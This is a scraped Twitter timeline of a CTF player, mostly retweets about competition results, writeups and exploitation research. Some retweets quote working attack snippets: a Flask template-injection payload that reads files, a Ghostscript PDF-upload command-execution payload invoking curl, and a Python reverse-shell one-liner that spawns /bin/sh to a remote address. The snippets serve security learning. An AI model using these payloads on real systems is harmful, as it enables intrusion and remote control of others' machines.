Tweetovi

Blokirali ste korisnika/cu @_bincat

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_bincat

  1. Prikvačeni tweet
    6. srp 2018.

    bincat means a cat in the bin :p

    Poništi
  2. proslijedio/la je Tweet
    29. pro 2019.

    We got 2nd place in ctf! Thanks to for the great problems.

    Poništi
  3. proslijedio/la je Tweet
    4. pro 2019.

    Better late than never. Official writeup repo from A*0*E release, along with the aforementioned tricky exp in the gomium challenge.

    Poništi
  4. proslijedio/la je Tweet
    Poništi
  5. proslijedio/la je Tweet
    19. stu 2019.

    We just released the challenges of this year's finals together with a short write up of the intended solutions: If anything is not clear, feel free to DM me and I can share more details about the challenges.

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    18. stu 2019.

    I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. payload not by me

    Poništi
  7. proslijedio/la je Tweet
    17. stu 2019.
    Poništi
  8. proslijedio/la je Tweet
    14. stu 2019.

    Pwntools 3.13.0 / 4.0.0beta0 released. 3.13 is mostly bugfixes, but 4 beta finally supports Py3! See for details

    Poništi
  9. proslijedio/la je Tweet
    7. stu 2019.

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    7. stu 2019.
    Poništi
  11. proslijedio/la je Tweet
    26. ruj 2019.

    I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"

    Poništi
  12. proslijedio/la je Tweet
    7. stu 2019.

    There are been some questions about my Hyper-V slides so they are now up at NB: POC will release all the slides in a week or so also. Certainly take a look of all of them - 1st day already had very good ones :)

    Poništi
  13. proslijedio/la je Tweet
    8. stu 2019.

    Exploiting Race Conditions Using the Scheduler by from P0 Detailed explanation of 3 exploits and associated techniques involving scheduler, preemption, stale TLB, fuse, userfaultfd and more to make hard to trigger races deterministic. 2/3

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    6. stu 2019.

    디스코드의 보안 취약점을 이용한 백도어가 발견됨 %AppData%\Discord\버젼\modules\discord_modules\index.js %AppData%\Discord\버젼\modules\discord_desktop_core\index.js 해당 파일의 내용이 2줄을 넘어가면 감염된 것이니 재설치 해야함 출처 :

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    6. stu 2019.
    Poništi
  16. proslijedio/la je Tweet
    8. stu 2019.
    Poništi
  17. proslijedio/la je Tweet
    22. lis 2019.

    Published the write-up of PoE - Path of Exploitation for HITCON CTF! Includes why and how I designed these challenges and how to exploit from the userspace program, the kernel, to QEMU!

    Poništi
  18. proslijedio/la je Tweet
    3. stu 2019.

    I wrote a tutorial about return 2 user technique. It's a bit incomplete. I have to add techniques for using 'iret' instruction to return directly to userspace. Any feedback is welcome

    Poništi
  19. 4. stu 2019.

    Instead of full writeup, I just wrote some comments on during the competition, I read and really helpful

    Prikaži ovu nit
    Poništi
  20. 4. stu 2019.

    Yes, micro-architectural attacks are always fun! Here is my solution

    Prikaži ovu nit
    Poništi
  21. 1. stu 2019.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·